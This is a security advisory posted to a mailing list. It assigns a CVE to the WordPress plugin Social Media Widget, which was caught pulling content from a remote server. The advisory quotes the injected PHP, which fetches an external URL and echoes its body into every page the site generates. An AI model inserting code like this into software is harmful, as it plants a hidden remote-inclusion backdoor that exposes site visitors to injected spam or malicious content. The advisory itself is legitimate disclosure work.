CVE-2013-1949 Social Media Widget remote file inclusion

[Kurt Seifried <kseifried () redhat com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html
http://securityledger.com/hacked-wordpress-plug-in-put-on-double-secret-probation/
http://it.slashdot.org/story/13/04/13/212226/popular-wordpress-plug-in-caught-spamming-is-put-on-probation

So the company responsible for Social Media Widget claims that a rogue
developer they contracted inserted this code:

470
471      $smw_url = "hxxp://i.aaur.net/i.php";
472      if(!function_exists("smw_get")){
473      function smw_get($f) {
474      $response = wp_remote_get( $f );
475      if( is_wp_error( $response ) ) {
476      function smw_get_body($f) {
477      $ch = @curl_init();
478      @curl_setopt($ch, CURLOPT_URL, $f);
479      @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
480      $output = @curl_exec($ch);
481      @curl_close($ch);
482      return $output;
483      }
484      echo smw_get_body($f);
485      } else {
486      echo $response["body"];
487      }
488      }
489      smw_get($smw_url);
490      }

Regardless of HOW this code got into the plugin it represents a
significant security issue. Any site using this plugin is pulling
"hxxp://i.aaur.net/i.php" and including it in the page they generate
and send to a user. This opens up a huge can of worms, anyone that can
man in the middle your server can now inject PHP into your blog, ot
anything sent to the clients/etc.

Please use CVE-2013-1949 for this issue.

- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)

iQIcBAEBAgAGBQJRai0SAAoJEBYNRVNeJnmT6loP/RkU7/7kLWkbMxzxK09A8LQs
S/YkaDcc3jx9qPL7RLEW837U/KVEuPxtCN1rHv4r/q2ZVsRUiNhkO/vhB37jXmrX
gNLP6sm0SMXj0v9FrllcDi6YsHmbekMInEdH3u+X9qE2nHJWsadXyzX6Pl4l3nOf
cC18tNm6QB6pTV1JCP3OZcri+AMP8tqMJA9E1evgsvu+0kPFB/6rgKViteA/ejVg
gkkiy6jdRnXw2PMsFVM0dOoXAXknvQu/7Ow0e2ONWhyhWIk6vifIqhtAqja58u/7
bqV/Jd7fLuj2fZEkuckZILbk+jgnTEdkVz12ym5/1ieYUtzj6KxhSP2lAwsWwV0F
+MKpeS0wW3z8KMzPnSGf8NOw+GdU+N+HzSgj6xpOUho53KFUppv2690CTlMMI9L6
drOOpDyP296pZPf7eoulnJnUOCSH8gX4+Rvk75YNrHnYL8VTxgUGcmJWyGLuQdGC
/ZI1IHdlkaRgL1O6w/DlLpKHV7E0Fj3silt/WwKwhB4kYQiei0dmVEuuMmYgq3vJ
6srRO5Glk9peB+3LHRXEUd8z36GZFXP0mmssPiWLuq1NfzROrYSq4xaqKuPsQ+uo
1tkrZ02LNsN7j2vFDLrTK6RpY6BjMUQvdY6rtiuy7fdbndNF6tt5rWr4xjIKoXti
DpvupDzrdKT6n8ffkTqV
=wTdQ
-----END PGP SIGNATURE-----